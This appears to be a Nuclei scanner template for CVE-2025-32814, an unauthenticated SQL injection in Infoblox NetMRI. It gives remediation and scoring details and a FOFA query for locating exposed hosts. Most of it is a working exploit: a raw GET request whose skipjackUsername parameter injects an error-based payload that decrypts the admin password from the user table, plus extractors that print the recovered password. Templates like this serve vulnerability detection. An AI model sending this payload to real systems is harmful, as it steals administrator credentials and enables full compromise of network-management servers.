id: CVE-2025-32814 info: name: NetMRI Unauthenticated SQL Injection via skipjackUsername author: iamnoooob,pdresearch severity: critical description: | An issue was discovered in Infoblox NETMRI before 7.6.1. Unauthenticated SQL Injection can occur. impact: | Unauthenticated attackers can extract sensitive data including encrypted passwords through SQL injection in the skipjackUsername parameter, potentially leading to complete system compromise. remediation: | Upgrade to Infoblox NetMRI version 7.6.1 or later that properly sanitizes SQL input parameters. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-32814 - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-32814 cwe-id: CWE-89 epss-score: 0.32102 epss-percentile: 0.96917 cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: infoblox product: netmri fofa-query: icon_hash="-319724102" tags: cve,cve2025,sqli,unauth,netmri,rails,error-based,vkev,vuln http: - raw: - | GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN HTTP/1.1 Host: {{Hostname}} extractors: - type: regex part: body name: password group: 1 regex: - "XPATH syntax error: '~(.*?)~'" internal: true - type: dsl dsl: - "'Password: ' + password" matchers: - type: word part: body words: - 'XPATH syntax error:' # digest: 4a0a00473045022100e3a484d85affd64720afc33dd95622d7dd97043526ad216de2280a77de6a4ce902206d709e5c0c2b2faa90ed4bde64d44626a0ce4f77b4e1f3213f9fbb64a73b9b22:922c64590222798bb761d5b6d8e72950